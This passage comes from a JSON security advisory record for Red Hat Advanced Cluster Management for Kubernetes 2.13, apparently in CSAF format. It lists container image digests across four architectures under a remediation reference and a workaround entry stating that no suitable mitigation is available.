"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
